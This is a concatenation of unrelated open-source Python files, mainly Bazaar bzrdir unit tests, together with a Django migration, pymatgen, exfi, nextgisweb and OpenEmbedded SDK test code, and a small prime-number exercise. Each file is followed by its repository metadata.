self.assertEqualBzrdirs([baz, foo, bar], bzrdir.BzrDir.find_bzrdirs(t))
def make_fake_permission_denied_transport(self, transport, paths):
"""Create a transport that raises PermissionDenied for some paths."""
def filter(path):
if path in paths:
raise errors.PermissionDenied(path)
return path
path_filter_server = pathfilter.PathFilteringServer(transport, filter)
path_filter_server.start_server()
self.addCleanup(path_filter_server.stop_server)
path_filter_transport = pathfilter.PathFilteringTransport(
path_filter_server, '.')
return (path_filter_server, path_filter_transport)
def assertBranchUrlsEndWith(self, expect_url_suffix, actual_bzrdirs):
"""Check that each branch url ends with the given suffix."""
for actual_bzrdir in actual_bzrdirs:
self.assertEndsWith(actual_bzrdir.user_url, expect_url_suffix)
def test_find_bzrdirs_permission_denied(self):
foo, bar, baz = self.make_foo_bar_baz()
t = self.get_transport()
path_filter_server, path_filter_transport = \
self.make_fake_permission_denied_transport(t, ['foo'])
# local transport
self.assertBranchUrlsEndWith('/baz/',
bzrdir.BzrDir.find_bzrdirs(path_filter_transport))
# smart server
smart_transport = self.make_smart_server('.',
backing_server=path_filter_server)
self.assertBranchUrlsEndWith('/baz/',
bzrdir.BzrDir.find_bzrdirs(smart_transport))
def test_find_bzrdirs_list_current(self):
def list_current(transport):
return [s for s in transport.list_dir('') if s != 'baz']
foo, bar, baz = self.make_foo_bar_baz()
t = self.get_transport()
self.assertEqualBzrdirs(
[foo, bar],
bzrdir.BzrDir.find_bzrdirs(t, list_current=list_current))
def test_find_bzrdirs_evaluate(self):
def evaluate(bzrdir):
try:
repo = bzrdir.open_repository()
except errors.NoRepositoryPresent:
return True, bzrdir.root_transport.base
else:
return False, bzrdir.root_transport.base
foo, bar, baz = self.make_foo_bar_baz()
t = self.get_transport()
self.assertEqual([baz.root_transport.base, foo.root_transport.base],
list(bzrdir.BzrDir.find_bzrdirs(t, evaluate=evaluate)))
def assertEqualBzrdirs(self, first, second):
first = list(first)
second = list(second)
self.assertEqual(len(first), len(second))
for x, y in zip(first, second):
self.assertEqual(x.root_transport.base, y.root_transport.base)
def test_find_branches(self):
root = self.make_repository('', shared=True)
foo, bar, baz = self.make_foo_bar_baz()
qux = self.make_bzrdir('foo/qux')
t = self.get_transport()
branches = bzrdir.BzrDir.find_branches(t)
self.assertEqual(baz.root_transport.base, branches[0].base)
self.assertEqual(foo.root_transport.base, branches[1].base)
self.assertEqual(bar.root_transport.base, branches[2].base)
# ensure this works without a top-level repo
branches = bzrdir.BzrDir.find_branches(t.clone('foo'))
self.assertEqual(foo.root_transport.base, branches[0].base)
self.assertEqual(bar.root_transport.base, branches[1].base)
class TestMissingRepoBranchesSkipped(TestCaseWithMemoryTransport):
def test_find_bzrdirs_missing_repo(self):
t = self.get_transport()
arepo = self.make_repository('arepo', shared=True)
abranch_url = arepo.user_url + '/abranch'
abranch = bzrdir.BzrDir.create(abranch_url).create_branch()
t.delete_tree('arepo/.bzr')
self.assertRaises(errors.NoRepositoryPresent,
branch.Branch.open, abranch_url)
self.make_branch('baz')
for actual_bzrdir in bzrdir.BzrDir.find_branches(t):
self.assertEndsWith(actual_bzrdir.user_url, '/baz/')
class TestMeta1DirFormat(TestCaseWithTransport):
"""Tests specific to the meta1 dir format."""
def test_right_base_dirs(self):
dir = bzrdir.BzrDirMetaFormat1().initialize(self.get_url())
t = dir.transport
branch_base = t.clone('branch').base
self.assertEqual(branch_base, dir.get_branch_transport(None).base)
self.assertEqual(branch_base,
dir.get_branch_transport(BzrBranchFormat5()).base)
repository_base = t.clone('repository').base
self.assertEqual(repository_base, dir.get_repository_transport(None).base)
repository_format = repository.format_registry.get_default()
self.assertEqual(repository_base,
dir.get_repository_transport(repository_format).base)
checkout_base = t.clone('checkout').base
self.assertEqual(checkout_base, dir.get_workingtree_transport(None).base)
self.assertEqual(checkout_base,
dir.get_workingtree_transport(workingtree_3.WorkingTreeFormat3()).base)
def test_meta1dir_uses_lockdir(self):
"""Meta1 format uses a LockDir to guard the whole directory, not a file."""
dir = bzrdir.BzrDirMetaFormat1().initialize(self.get_url())
t = dir.transport
self.assertIsDirectory('branch-lock', t)
def test_comparison(self):
"""Equality and inequality behave properly.
Metadirs should compare equal iff they have the same repo, branch and
tree formats.
"""
mydir = controldir.format_registry.make_bzrdir('knit')
self.assertEqual(mydir, mydir)
self.assertFalse(mydir != mydir)
otherdir = controldir.format_registry.make_bzrdir('knit')
self.assertEqual(otherdir, mydir)
self.assertFalse(otherdir != mydir)
otherdir2 = controldir.format_registry.make_bzrdir('development-subtree')
self.assertNotEqual(otherdir2, mydir)
self.assertFalse(otherdir2 == mydir)
def test_with_features(self):
tree = self.make_branch_and_tree('tree', format='2a')
tree.bzrdir.update_feature_flags({"bar": "required"})
self.assertRaises(errors.MissingFeature, bzrdir.BzrDir.open, 'tree')
bzrdir.BzrDirMetaFormat1.register_feature('bar')
self.addCleanup(bzrdir.BzrDirMetaFormat1.unregister_feature, 'bar')
dir = bzrdir.BzrDir.open('tree')
self.assertEquals("required", dir._format.features.get("bar"))
tree.bzrdir.update_feature_flags({"bar": None, "nonexistant": None})
dir = bzrdir.BzrDir.open('tree')
self.assertEquals({}, dir._format.features)
def test_needs_conversion_different_working_tree(self):
# meta1dirs need an conversion if any element is not the default.
new_format = controldir.format_registry.make_bzrdir('dirstate')
tree = self.make_branch_and_tree('tree', format='knit')
self.assertTrue(tree.bzrdir.needs_format_conversion(
new_format))
def test_initialize_on_format_uses_smart_transport(self):
self.setup_smart_server_with_call_log()
new_format = controldir.format_registry.make_bzrdir('dirstate')
transport = self.get_transport('target')
transport.ensure_base()
self.reset_smart_call_log()
instance = new_format.initialize_on_transport(transport)
self.assertIsInstance(instance, remote.RemoteBzrDir)
rpc_count = len(self.hpss_calls)
# This figure represent the amount of work to perform this use case. It
# is entirely ok to reduce this number if a test fails due to rpc_count
# being too low. If rpc_count increases, more network roundtrips have
# become necessary for this use case. Please do not adjust this number
# upwards without agreement from bzr's network support maintainers.
self.assertEqual(2, rpc_count)
class NonLocalTests(TestCaseWithTransport):
"""Tests for bzrdir static behaviour on non local paths."""
def setUp(self):
super(NonLocalTests, self).setUp()
self.vfs_transport_factory = memory.MemoryServer
def test_create_branch_convenience(self):
# outside a repo the default convenience output is a repo+branch_tree
format = controldir.format_registry.make_bzrdir('knit')
branch = bzrdir.BzrDir.create_branch_convenience(
self.get_url('foo'), format=format)
self.assertRaises(errors.NoWorkingTree,
branch.bzrdir.open_workingtree)
branch.bzrdir.open_repository()
def test_create_branch_convenience_force_tree_not_local_fails(self):
# outside a repo the default convenience output is a repo+branch_tree
format = controldir.format_registry.make_bzrdir('knit')
self.assertRaises(errors.NotLocalUrl,
bzrdir.BzrDir.create_branch_convenience,
self.get_url('foo'),
force_new_tree=True,
format=format)
t = self.get_transport()
self.assertFalse(t.has('foo'))
def test_clone(self):
# clone into a nonlocal path works
format = controldir.format_registry.make_bzrdir('knit')
branch = bzrdir.BzrDir.create_branch_convenience('local',
format=format)
branch.bzrdir.open_workingtree()
result = branch.bzrdir.clone(self.get_url('remote'))
self.assertRaises(errors.NoWorkingTree,
result.open_workingtree)
result.open_branch()
result.open_repository()
def test_checkout_metadir(self):
# checkout_metadir has reasonable working tree format even when no
# working tree is present
self.make_branch('branch-knit2', format='dirstate-with-subtree')
my_bzrdir = bzrdir.BzrDir.open(self.get_url('branch-knit2'))
checkout_format = my_bzrdir.checkout_metadir()
self.assertIsInstance(checkout_format.workingtree_format,
workingtree_4.WorkingTreeFormat4)
class TestHTTPRedirections(object):
"""Test redirection between two http servers.
This MUST be used by daughter classes that also inherit from
TestCaseWithTwoWebservers.
We can't inherit directly from TestCaseWithTwoWebservers or the
test framework will try to create an instance which cannot
run, its implementation being incomplete.
"""
def create_transport_readonly_server(self):
# We don't set the http protocol version, relying on the default
return http_utils.HTTPServerRedirecting()
def create_transport_secondary_server(self):
# We don't set the http protocol version, relying on the default
return http_utils.HTTPServerRedirecting()
def setUp(self):
super(TestHTTPRedirections, self).setUp()
# The redirections will point to the new server
self.new_server = self.get_readonly_server()
# The requests to the old server will be redirected
self.old_server = self.get_secondary_server()
# Configure the redirections
self.old_server.redirect_to(self.new_server.host, self.new_server.port)
def test_loop(self):
# Both servers redirect to each other creating a loop
self.new_server.redirect_to(self.old_server.host, self.old_server.port)
# Starting from either server should loop
old_url = self._qualified_url(self.old_server.host,
self.old_server.port)
oldt = self._transport(old_url)
self.assertRaises(errors.NotBranchError,
bzrdir.BzrDir.open_from_transport, oldt)
new_url = self._qualified_url(self.new_server.host,
self.new_server.port)
newt = self._transport(new_url)
self.assertRaises(errors.NotBranchError,
bzrdir.BzrDir.open_from_transport, newt)
def test_qualifier_preserved(self):
wt = self.make_branch_and_tree('branch')
old_url = self._qualified_url(self.old_server.host,
self.old_server.port)
start = self._transport(old_url).clone('branch')
bdir = bzrdir.BzrDir.open_from_transport(start)
# Redirection should preserve the qualifier, hence the transport class
# itself.
self.assertIsInstance(bdir.root_transport, type(start))
class TestHTTPRedirections_urllib(TestHTTPRedirections,
http_utils.TestCaseWithTwoWebservers):
"""Tests redirections for urllib implementation"""
_transport = HttpTransport_urllib
def _qualified_url(self, host, port):
result = 'http+urllib://%s:%s' % (host, port)
self.permit_url(result)
return result
class TestHTTPRedirections_pycurl(TestWithTransport_pycurl,
TestHTTPRedirections,
http_utils.TestCaseWithTwoWebservers):
"""Tests redirections for pycurl implementation"""
def _qualified_url(self, host, port):
result = 'http+pycurl://%s:%s' % (host, port)
self.permit_url(result)
return result
class TestHTTPRedirections_nosmart(TestHTTPRedirections,
http_utils.TestCaseWithTwoWebservers):
"""Tests redirections for the nosmart decorator"""
_transport = NoSmartTransportDecorator
def _qualified_url(self, host, port):
result = 'nosmart+http://%s:%s' % (host, port)
self.permit_url(result)
return result
class TestHTTPRedirections_readonly(TestHTTPRedirections,
http_utils.TestCaseWithTwoWebservers):
"""Tests redirections for readonly decoratror"""
_transport = ReadonlyTransportDecorator
def _qualified_url(self, host, port):
result = 'readonly+http://%s:%s' % (host, port)
self.permit_url(result)
return result
class TestDotBzrHidden(TestCaseWithTransport):
ls = ['ls']
if sys.platform == 'win32':
ls = [os.environ['COMSPEC'], '/C', 'dir', '/B']
def get_ls(self):
f = subprocess.Popen(self.ls, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = f.communicate()
self.assertEqual(0, f.returncode, 'Calling %s failed: %s'
% (self.ls, err))
return out.splitlines()
def test_dot_bzr_hidden(self):
if sys.platform == 'win32' and not win32utils.has_win32file:
raise TestSkipped('unable to make file hidden without pywin32 library')
b = bzrdir.BzrDir.create('.')
self.build_tree(['a'])
self.assertEquals(['a'], self.get_ls())
def test_dot_bzr_hidden_with_url(self):
if sys.platform == 'win32' and not win32utils.has_win32file:
raise TestSkipped('unable to make file hidden without pywin32 library')
b = bzrdir.BzrDir.create(urlutils.local_path_to_url('.'))
self.build_tree(['a'])
self.assertEquals(['a'], self.get_ls())
class _TestBzrDirFormat(bzrdir.BzrDirMetaFormat1):
"""Test BzrDirFormat implementation for TestBzrDirSprout."""
def _open(self, transport):
return _TestBzrDir(transport, self)
class _TestBzrDir(bzrdir.BzrDirMeta1):
"""Test BzrDir implementation for TestBzrDirSprout.
When created a _TestBzrDir already has repository and a branch. The branch
is a test double as well.
"""
def __init__(self, *args, **kwargs):
super(_TestBzrDir, self).__init__(*args, **kwargs)
self.test_branch = _TestBranch(self.transport)
self.test_branch.repository = self.create_repository()
def open_branch(self, unsupported=False, possible_transports=None):
return self.test_branch
def cloning_metadir(self, require_stacking=False):
return _TestBzrDirFormat()
class _TestBranchFormat(bzrlib.branch.BranchFormat):
"""Test Branch format for TestBzrDirSprout."""
class _TestBranch(bzrlib.branch.Branch):
"""Test Branch implementation for TestBzrDirSprout."""
def __init__(self, transport, *args, **kwargs):
self._format = _TestBranchFormat()
self._transport = transport
self.base = transport.base
super(_TestBranch, self).__init__(*args, **kwargs)
self.calls = []
self._parent = None
def sprout(self, *args, **kwargs):
self.calls.append('sprout')
return _TestBranch(self._transport)
def copy_content_into(self, destination, revision_id=None):
self.calls.append('copy_content_into')
def last_revision(self):
return _mod_revision.NULL_REVISION
def get_parent(self):
return self._parent
def _get_config(self):
return config.TransportConfig(self._transport, 'branch.conf')
def _get_config_store(self):
return config.BranchStore(self)
def set_parent(self, parent):
self._parent = parent
def lock_read(self):
return lock.LogicalLockResult(self.unlock)
def unlock(self):
return
class TestBzrDirSprout(TestCaseWithMemoryTransport):
def test_sprout_uses_branch_sprout(self):
"""BzrDir.sprout calls Branch.sprout.
Usually, BzrDir.sprout should delegate to the branch's sprout method
for part of the work. This allows the source branch to control the
choice of format for the new branch.
There are exceptions, but this tests avoids them:
- if there's no branch in the source bzrdir,
- or if the stacking has been requested and the format needs to be
overridden to satisfy that.
"""
# Make an instrumented bzrdir.
t = self.get_transport('source')
t.ensure_base()
source_bzrdir = _TestBzrDirFormat().initialize_on_transport(t)
# The instrumented bzrdir has a test_branch attribute that logs calls
# made to the branch contained in that bzrdir. Initially the test
# branch exists but no calls have been made to it.
self.assertEqual([], source_bzrdir.test_branch.calls)
# Sprout the bzrdir
target_url = self.get_url('target')
result = source_bzrdir.sprout(target_url, recurse='no')
# The bzrdir called the branch's sprout method.
self.assertSubset(['sprout'], source_bzrdir.test_branch.calls)
def test_sprout_parent(self):
grandparent_tree = self.make_branch('grandparent')
parent = grandparent_tree.bzrdir.sprout('parent').open_branch()
branch_tree = parent.bzrdir.sprout('branch').open_branch()
self.assertContainsRe(branch_tree.get_parent(), '/parent/$')
class TestBzrDirHooks(TestCaseWithMemoryTransport):
def test_pre_open_called(self):
calls = []
bzrdir.BzrDir.hooks.install_named_hook('pre_open', calls.append, None)
transport = self.get_transport('foo')
url = transport.base
self.assertRaises(errors.NotBranchError, bzrdir.BzrDir.open, url)
self.assertEqual([transport.base], [t.base for t in calls])
def test_pre_open_actual_exceptions_raised(self):
count = [0]
def fail_once(transport):
count[0] += 1
if count[0] == 1:
raise errors.BzrError("fail")
bzrdir.BzrDir.hooks.install_named_hook('pre_open', fail_once, None)
transport = self.get_transport('foo')
url = transport.base
err = self.assertRaises(errors.BzrError, bzrdir.BzrDir.open, url)
self.assertEqual('fail', err._preformatted_string)
def test_post_repo_init(self):
from bzrlib.controldir import RepoInitHookParams
calls = []
bzrdir.BzrDir.hooks.install_named_hook('post_repo_init',
calls.append, None)
self.make_repository('foo')
self.assertLength(1, calls)
params = calls[0]
self.assertIsInstance(params, RepoInitHookParams)
self.assertTrue(hasattr(params, 'bzrdir'))
self.assertTrue(hasattr(params, 'repository'))
def test_post_repo_init_hook_repr(self):
param_reprs = []
bzrdir.BzrDir.hooks.install_named_hook('post_repo_init',
lambda params: param_reprs.append(repr(params)), None)
self.make_repository('foo')
self.assertLength(1, param_reprs)
param_repr = param_reprs[0]
self.assertStartsWith(param_repr, '<RepoInitHookParams for ')
class TestGenerateBackupName(TestCaseWithMemoryTransport):
# FIXME: This may need to be unified with test_osutils.TestBackupNames or
# moved to per_bzrdir or per_transport for better coverage ?
# -- vila 20100909
def setUp(self):
super(TestGenerateBackupName, self).setUp()
self._transport = self.get_transport()
bzrdir.BzrDir.create(self.get_url(),
possible_transports=[self._transport])
self._bzrdir = bzrdir.BzrDir.open_from_transport(self._transport)
def test_new(self):
self.assertEqual("a.~1~", self._bzrdir._available_backup_name("a"))
def test_exiting(self):
self._transport.put_bytes("a.~1~", "some content")
self.assertEqual("a.~2~", self._bzrdir._available_backup_name("a"))
class TestMeta1DirColoFormat(TestCaseWithTransport):
"""Tests specific to the meta1 dir with colocated branches format."""
def test_supports_colo(self):
format = bzrdir.BzrDirMetaFormat1Colo()
self.assertTrue(format.colocated_branches)
def test_upgrade_from_2a(self):
tree = self.make_branch_and_tree('.', format='2a')
format = bzrdir.BzrDirMetaFormat1Colo()
self.assertTrue(tree.bzrdir.needs_format_conversion(format))
converter = tree.bzrdir._format.get_converter(format)
result = converter.convert(tree.bzrdir, None)
self.assertIsInstance(result._format, bzrdir.BzrDirMetaFormat1Colo)
self.assertFalse(result.needs_format_conversion(format))
def test_downgrade_to_2a(self):
tree = self.make_branch_and_tree('.', format='development-colo')
format = bzrdir.BzrDirMetaFormat1()
self.assertTrue(tree.bzrdir.needs_format_conversion(format))
converter = tree.bzrdir._format.get_converter(format)
result = converter.convert(tree.bzrdir, None)
self.assertIsInstance(result._format, bzrdir.BzrDirMetaFormat1)
self.assertFalse(result.needs_format_conversion(format))
def test_downgrade_to_2a_too_many_branches(self):
tree = self.make_branch_and_tree('.', format='development-colo')
tree.bzrdir.create_branch(name="another-colocated-branch")
converter = tree.bzrdir._format.get_converter(
bzrdir.BzrDirMetaFormat1())
result = converter.convert(tree.bzrdir, bzrdir.BzrDirMetaFormat1())
self.assertIsInstance(result._format, bzrdir.BzrDirMetaFormat1)
def test_nested(self):
tree = self.make_branch_and_tree('.', format='development-colo')
tree.bzrdir.create_branch(name='foo')
tree.bzrdir.create_branch(name='fool/bla')
self.assertRaises(
errors.ParentBranchExists, tree.bzrdir.create_branch,
name='foo/bar')
def test_parent(self):
tree = self.make_branch_and_tree('.', format='development-colo')
tree.bzrdir.create_branch(name='fool/bla')
tree.bzrdir.create_branch(name='foo/bar')
self.assertRaises(
errors.AlreadyBranchError, tree.bzrdir.create_branch,
name='foo')
class SampleBzrFormat(bzrdir.BzrFormat):
@classmethod
def get_format_string(cls):
return "First line\n"
class TestBzrFormat(TestCase):
"""Tests for BzrFormat."""
def test_as_string(self):
format = SampleBzrFormat()
format.features = {"foo": "required"}
self.assertEquals(format.as_string(),
"First line\n"
"required foo\n")
format.features["another"] = "optional"
self.assertEquals(format.as_string(),
"First line\n"
"required foo\n"
"optional another\n")
def test_network_name(self):
# The network string should include the feature info
format = SampleBzrFormat()
format.features = {"foo": "required"}
self.assertEquals(
"First line\nrequired foo\n",
format.network_name())
def test_from_string_no_features(self):
# No features
format = SampleBzrFormat.from_string(
"First line\n")
self.assertEquals({}, format.features)
def test_from_string_with_feature(self):
# Proper feature
format = SampleBzrFormat.from_string(
"First line\nrequired foo\n")
self.assertEquals("required", format.features.get("foo"))
def test_from_string_format_string_mismatch(self):
# The first line has to match the format string
self.assertRaises(AssertionError, SampleBzrFormat.from_string,
"Second line\nrequired foo\n")
def test_from_string_missing_space(self):
# At least one space is required in the feature lines
self.assertRaises(errors.ParseFormatError, SampleBzrFormat.from_string,
"First line\nfoo\n")
def test_from_string_with_spaces(self):
# Feature with spaces (in case we add stuff like this in the future)
format = SampleBzrFormat.from_string(
"First line\nrequired foo with spaces\n")
self.assertEquals("required", format.features.get("foo with spaces"))
def test_eq(self):
format1 = SampleBzrFormat()
format1.features = {"nested-trees": "optional"}
format2 = SampleBzrFormat()
format2.features = {"nested-trees": "optional"}
self.assertEquals(format1, format1)
self.assertEquals(format1, format2)
format3 = SampleBzrFormat()
self.assertNotEquals(format1, format3)
def test_check_support_status_optional(self):
# Optional, so silently ignore
format = SampleBzrFormat()
format.features = {"nested-trees": "optional"}
format.check_support_status(True)
self.addCleanup(SampleBzrFormat.unregister_feature, "nested-trees")
SampleBzrFormat.register_feature("nested-trees")
format.check_support_status(True)
def test_check_support_status_required(self):
# Optional, so trigger an exception
format = SampleBzrFormat()
format.features = {"nested-trees": "required"}
self.assertRaises(errors.MissingFeature, format.check_support_status,
True)
self.addCleanup(SampleBzrFormat.unregister_feature, "nested-trees")
SampleBzrFormat.register_feature("nested-trees")
format.check_support_status(True)
def test_check_support_status_unknown(self):
# treat unknown necessity as required
format = SampleBzrFormat()
format.features = {"nested-trees": "unknown"}
self.assertRaises(errors.MissingFeature, format.check_support_status,
True)
self.addCleanup(SampleBzrFormat.unregister_feature, "nested-trees")
SampleBzrFormat.register_feature("nested-trees")
format.check_support_status(True)
def test_feature_already_registered(self):
# a feature can only be registered once
self.addCleanup(SampleBzrFormat.unregister_feature, "nested-trees")
SampleBzrFormat.register_feature("nested-trees")
self.assertRaises(errors.FeatureAlreadyRegistered,
SampleBzrFormat.register_feature, "nested-trees")
def test_feature_with_space(self):
# spaces are not allowed in feature names
self.assertRaises(ValueError, SampleBzrFormat.register_feature,
"nested trees")
|
Distrotech/bzr
|
bzrlib/tests/test_bzrdir.py
|
Python
|
gpl-2.0
| 68,233
| 0.001597
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-07 06:05
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('news', '0003_auto_20170228_2249'),
]
operations = [
migrations.CreateModel(
name='Location',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('city', models.CharField(default='Testville', max_length=200)),
('state', models.CharField(default='Montigania', max_length=200)),
],
),
migrations.AddField(
model_name='newspaper',
name='next_paper',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='news.Newspaper'),
),
migrations.AddField(
model_name='newspaper',
name='prev_paper',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='news.Newspaper'),
),
migrations.AlterField(
model_name='newspaper',
name='date_ended',
field=models.DateField(blank=True, null=True, verbose_name='date ended'),
),
migrations.AlterUniqueTogether(
name='location',
unique_together=set([('city', 'state')]),
),
migrations.AddField(
model_name='newspaper',
name='location',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='news.Location'),
),
]
|
GeorgiaTechDHLab/TOME
|
news/migrations/0004_auto_20170307_0605.py
|
Python
|
bsd-3-clause
| 1,746
| 0.004009
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
#!/usr/bin/env python
from __future__ import division, unicode_literals
"""
#TODO: Write module doc.
"""
__author__ = 'Shyue Ping Ong'
__copyright__ = 'Copyright 2013, The Materials Virtual Lab'
__version__ = '0.1'
__maintainer__ = 'Shyue Ping Ong'
__email__ = 'ongsp@ucsd.edu'
__date__ = '8/1/15'
import warnings
warnings.warn("pymatgen.io.aseio has been moved pymatgen.io.ase. This stub "
"will be removed in pymatgen 4.0.", DeprecationWarning)
from .ase import *
|
Bismarrck/pymatgen
|
pymatgen/io/aseio.py
|
Python
|
mit
| 594
| 0.003367
|
#!/usr/bin/env python3
"""tests.test_io.test_read_gfa.py: tests for exfi.io.read_gfa.py"""
from unittest import TestCase, main
from exfi.io.read_gfa import read_gfa1
from tests.io.gfa1 import \
HEADER, \
SEGMENTS_EMPTY, SEGMENTS_SIMPLE, SEGMENTS_COMPLEX, \
SEGMENTS_COMPLEX_SOFT, SEGMENTS_COMPLEX_HARD, \
LINKS_EMPTY, LINKS_SIMPLE, LINKS_COMPLEX, \
CONTAINMENTS_EMPTY, CONTAINMENTS_SIMPLE, CONTAINMENTS_COMPLEX, \
PATHS_EMPTY, PATHS_SIMPLE, PATHS_COMPLEX, \
GFA1_EMPTY_FN, GFA1_SIMPLE_FN, GFA1_COMPLEX_FN, \
GFA1_COMPLEX_SOFT_FN, GFA1_COMPLEX_HARD_FN
class TestReadGFA1(TestCase):
"""Tests for exfi.io.read_gfa.read_gfa1"""
def test_empty(self):
"""exfi.io.read_gfa.read_gfa1: empty case"""
gfa1 = read_gfa1(GFA1_EMPTY_FN)
self.assertTrue(gfa1['header'].equals(HEADER))
self.assertTrue(gfa1['segments'].equals(SEGMENTS_EMPTY))
self.assertTrue(gfa1['links'].equals(LINKS_EMPTY))
self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_EMPTY))
self.assertTrue(gfa1['paths'].equals(PATHS_EMPTY))
def test_simple(self):
"""exfi.io.read_gfa.read_gfa1: simple case"""
gfa1 = read_gfa1(GFA1_SIMPLE_FN)
self.assertTrue(gfa1['header'].equals(HEADER))
self.assertTrue(gfa1['segments'].equals(SEGMENTS_SIMPLE))
self.assertTrue(gfa1['links'].equals(LINKS_SIMPLE))
self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_SIMPLE))
self.assertTrue(gfa1['paths'].equals(PATHS_SIMPLE))
def test_complex(self):
"""exfi.io.read_gfa.read_gfa1: complex case"""
gfa1 = read_gfa1(GFA1_COMPLEX_FN)
self.assertTrue(gfa1['header'].equals(HEADER))
self.assertTrue(gfa1['segments'].equals(SEGMENTS_COMPLEX))
self.assertTrue(gfa1['links'].equals(LINKS_COMPLEX))
self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_COMPLEX))
self.assertTrue(gfa1['paths'].equals(PATHS_COMPLEX))
def test_complex_soft(self):
"""exfi.io.read_gfa.read_gfa1: complex and soft masking case"""
gfa1 = read_gfa1(GFA1_COMPLEX_SOFT_FN)
self.assertTrue(gfa1['header'].equals(HEADER))
self.assertTrue(gfa1['segments'].equals(SEGMENTS_COMPLEX_SOFT))
self.assertTrue(gfa1['links'].equals(LINKS_COMPLEX))
self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_COMPLEX))
self.assertTrue(gfa1['paths'].equals(PATHS_COMPLEX))
def test_complex_hard(self):
"""exfi.io.read_gfa.read_gfa1: complex and hard masking case"""
gfa1 = read_gfa1(GFA1_COMPLEX_HARD_FN)
self.assertTrue(gfa1['header'].equals(HEADER))
self.assertTrue(gfa1['segments'].equals(SEGMENTS_COMPLEX_HARD))
self.assertTrue(gfa1['links'].equals(LINKS_COMPLEX))
self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_COMPLEX))
self.assertTrue(gfa1['paths'].equals(PATHS_COMPLEX))
if __name__ == '__main__':
main()
|
jlanga/exfi
|
tests/test_io/test_read_gfa.py
|
Python
|
mit
| 2,975
| 0.000672
|
# coding=utf-8
import json
import codecs
import os
import transaction
from nextgisweb import DBSession
from nextgisweb.vector_layer import VectorLayer
from nextgisweb_compulink.compulink_admin.model import BASE_PATH
def update_actual_lyr_names(args):
db_session = DBSession()
transaction.manager.begin()
# what update
upd_real_layers = ['real_access_point', 'real_fosc', 'real_optical_cable', 'real_optical_cable_point',
'real_optical_cross', 'real_special_transition', 'real_special_transition_point']
upd_real_lyr_names = {}
# new names (already in templates!)
real_layers_template_path = os.path.join(BASE_PATH, 'real_layers_templates/')
for up_lyr_name in upd_real_layers:
with codecs.open(os.path.join(real_layers_template_path, up_lyr_name + '.json'), encoding='utf-8') as json_file:
json_layer_struct = json.load(json_file, encoding='utf-8')
new_name = json_layer_struct['resource']['display_name']
upd_real_lyr_names[up_lyr_name] = new_name
# update now
resources = db_session.query(VectorLayer).filter(VectorLayer.keyname.like('real_%')).all()
for vec_layer in resources:
lyr_name = vec_layer.keyname
if not lyr_name:
continue
for up_lyr_name in upd_real_lyr_names.keys():
if lyr_name.startswith(up_lyr_name) and not lyr_name.startswith(up_lyr_name + '_point'): # ugly!
vec_layer.display_name = upd_real_lyr_names[up_lyr_name]
print '%s updated' % lyr_name
break
transaction.manager.commit()
db_session.close()
|
nextgis/nextgisweb_compulink
|
nextgisweb_compulink/db_migrations/update_actual_lyr_names.py
|
Python
|
gpl-2.0
| 1,646
| 0.003645
|
#
# SPDX-License-Identifier: MIT
#
import os
import shutil
import unittest
from oeqa.core.utils.path import remove_safe
from oeqa.sdk.case import OESDKTestCase
from oeqa.utils.subprocesstweak import errors_have_output
errors_have_output()
class GccCompileTest(OESDKTestCase):
td_vars = ['MACHINE']
@classmethod
def setUpClass(self):
files = {'test.c' : self.tc.files_dir, 'test.cpp' : self.tc.files_dir,
'testsdkmakefile' : self.tc.sdk_files_dir}
for f in files:
shutil.copyfile(os.path.join(files[f], f),
os.path.join(self.tc.sdk_dir, f))
def setUp(self):
machine = self.td.get("MACHINE")
if not (self.tc.hasHostPackage("packagegroup-cross-canadian-%s" % machine) or
self.tc.hasHostPackage("^gcc-", regex=True)):
raise unittest.SkipTest("GccCompileTest class: SDK doesn't contain a cross-canadian toolchain")
def test_gcc_compile(self):
self._run('$CC %s/test.c -o %s/test -lm' % (self.tc.sdk_dir, self.tc.sdk_dir))
def test_gpp_compile(self):
self._run('$CXX %s/test.c -o %s/test -lm' % (self.tc.sdk_dir, self.tc.sdk_dir))
def test_gpp2_compile(self):
self._run('$CXX %s/test.cpp -o %s/test -lm' % (self.tc.sdk_dir, self.tc.sdk_dir))
def test_make(self):
self._run('cd %s; make -f testsdkmakefile' % self.tc.sdk_dir)
@classmethod
def tearDownClass(self):
files = [os.path.join(self.tc.sdk_dir, f) \
for f in ['test.c', 'test.cpp', 'test.o', 'test',
'testsdkmakefile']]
for f in files:
remove_safe(f)
|
schleichdi2/OPENNFR-6.3-CORE
|
opennfr-openembedded-core/meta/lib/oeqa/sdk/cases/gcc.py
|
Python
|
gpl-2.0
| 1,658
| 0.009047
|
#!/usr/bin/env python3
print('Content-type: text/html')
print()
primes = [2, *range(3, 10001, 2)]
for div in primes:
idx = div + 1
while(idx < len(primes)):
if (primes[idx] % div == 0):
del primes[idx]
idx += 1
print(primes)
|
JulianNicholls/Complete-Web-Course-2.0
|
13-Python/challenge2.py
|
Python
|
mit
| 249
| 0.012048
|
#!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
